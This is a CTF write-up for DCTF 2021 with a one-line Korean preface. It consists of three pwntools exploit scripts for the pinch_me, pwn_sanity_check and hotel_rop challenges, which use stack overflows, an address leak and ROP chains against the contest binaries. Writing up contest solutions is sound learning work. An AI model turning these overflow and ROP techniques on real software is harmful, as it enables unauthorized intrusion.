DCTF 2021 Write-UP

개인 사정으로 인해, 대회가 끝나고 풀었지만, 해답은 보지않았음

pinch_me

from pwn import *

#p = process('./pinch_me')
p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480)
e = ELF('./pinch_me')

payload = b''
payload += b'A'*24
payload += p64(0x1337C0DE)

p.sendlineafter('dreaming?\n', payload)

p.interactive()

pwn_sanity_check

from pwn import *

#p = process('./pwn_sanity_check')
p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io', 7480)
e = ELF('./pwn_sanity_check')

poprdi = 0x400813
poprsi = 0x400811
#gdb.attach(p)
payload = b''
#payload += b'A'*0x48
payload += b'A'*60
payload += p64(0xDEADC0DE)
payload += b'B'*4
payload += p64(poprdi)
payload += p64(0xDEADBEEF)
payload += p64(poprsi)
payload += p64(0x1337C0DE)
payload += p64(0)
payload += p64(0x400697)

p.sendlineafter('joke\n', payload)

p.interactive()

hotel_rop

from pwn import *

p = process('./hotel_rop')
e = ELF('./hotel_rop')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

silicon_offset = e.symbols['silicon_valley']
california_offset = e.symbols['california']
loss_offset = e.symbols['loss']

p.recvuntil('street ')
main_addr = (int(p.recv(14), 16))
libc_addr = main_addr - e.symbols['main']
silicon_addr = libc_addr + silicon_offset
california_addr = libc_addr + california_offset
loss_addr = libc_addr + loss_offset
poprdi = libc_addr + 0x140b
poprsi = libc_addr + 0x1409

print("[+] libc_base addr 0x%x"% libc_addr)
print("[+] california_addr : 0x%x" % california_addr)
print("[+] silicon_addr : 0x%x" % silicon_addr)

payload = b"A"*0x20
payload += b"B"*8
payload += p64(california_addr)
payload += p64(silicon_addr)
payload += p64(poprdi)
payload += p64(0x1337C0DE)
payload += p64(poprsi)
payload += p64(0xCB760000)
payload += p64(0)
payload += p64(loss_addr)
p.sendlineafter('often?\n', payload)

p.interactive()